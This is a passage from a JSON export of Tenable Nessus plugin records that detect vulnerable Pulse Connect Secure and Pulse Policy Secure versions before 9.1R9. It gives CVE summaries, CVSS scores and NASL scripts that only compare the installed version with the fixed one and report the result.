value:\"cpe:/a:pulsesecure:pulse_policy_secure\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"pulse_policy_secure_detect.nbin\");\n script_require_keys(\"installed_sw/Pulse Policy Secure\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp_info = vcf::get_app_info(app:'Pulse Policy Secure', port:443);\n\nconstraints = [\n {'fixed_version':'9.1R9'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_WARNING,\n flags:{'xss':TRUE}\n);\n\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-09-09T00:04:57", "description": "According to its self-reported version, the version of Pulse Connect Secure running on the remote host is prior to 9.1R9. It is, therefore, affected by multiple vulnerabilities:\n\n - A vulnerability in the Pulse Connect Secure < 9.1R9 admin web interface could allow an authenticated attacker to perform an arbitrary code execution using uncontrolled gzip extraction. (CVE-2020-8260)\n\n - A vulnerability in the Pulse Connect Secure / Pulse Policy Secure < 9.1R9 is vulnerable to arbitrary cookie injection. (CVE-2020-8261)\n\n - jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable\n __proto__ property, it could extend the native Object.prototype. (CVE-2019-11358)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.2, "vector": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-10-30T00:00:00", "type": "nessus", "title": "Pulse Connect Secure < 9.1R9 (SA44601)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-9251", "CVE-2019-11358", "CVE-2020-8255", "CVE-2020-8260", "CVE-2020-8261", "CVE-2020-8262", "CVE-2020-8263", "CVE-2020-15352"], "modified": "2021-06-23T00:00:00", "cpe": ["cpe:/a:pulsesecure:pulse_connect_secure"], "id": "PULSE_CONNECT_SECURE-SA44601.NASL", "href": "https://www.tenable.com/plugins/nessus/142058", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142058);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/23\");\n\n script_cve_id(\n \"CVE-2015-9251\",\n \"CVE-2019-11358\",\n \"CVE-2020-8255\",\n \"CVE-2020-8260\",\n \"CVE-2020-8261\",\n \"CVE-2020-8262\",\n \"CVE-2020-8263\",\n \"CVE-2020-15352\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0495\");\n\n script_name(english:\"Pulse Connect Secure < 9.1R9 (SA44601)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the version of Pulse Connect Secure running on the remote host is prior \nto 9.1R9. It is, therefore, affected by multiple vulnerabilities:\n\n - A vulnerability in the Pulse Connect Secure < 9.1R9 admin web interface could allow an authenticated\n attacker to perform an arbitrary code execution using uncontrolled gzip extraction. (CVE-2020-8260)\n\n - A vulnerability in the Pulse Connect Secure / Pulse Policy Secure < 9.1R9 is vulnerable to arbitrary\n cookie injection. (CVE-2020-8261)\n\n - jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true,\n {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable\n __proto__ property, it could extend the native Object.prototype. (CVE-2019-11358)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Pulse Connect Secure version 9.1R9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-8260\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Pulse Secure VPN gzip RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pulsesecure:pulse_connect_secure\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"pulse_connect_secure_detect.nbin\");\n script_require_keys(\"installed_sw/Pulse Connect Secure\");\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nport = get_http_port(default:443, embedded:TRUE);\napp_info = vcf::pulse_connect_secure::get_app_info(app:'Pulse Connect Secure', port:port, full_version:TRUE, webapp:TRUE);\n\n# full ver from https://www-prev.pulsesecure.net/techpubs/pulse-connect-secure/pcs/9.1rx/9.1r9\nconstraints = [\n {'fixed_version':'9.1.9.9189', 'fixed_display':'9.1R9'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_WARNING,\n flags:{'xss':TRUE}\n);\n\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}
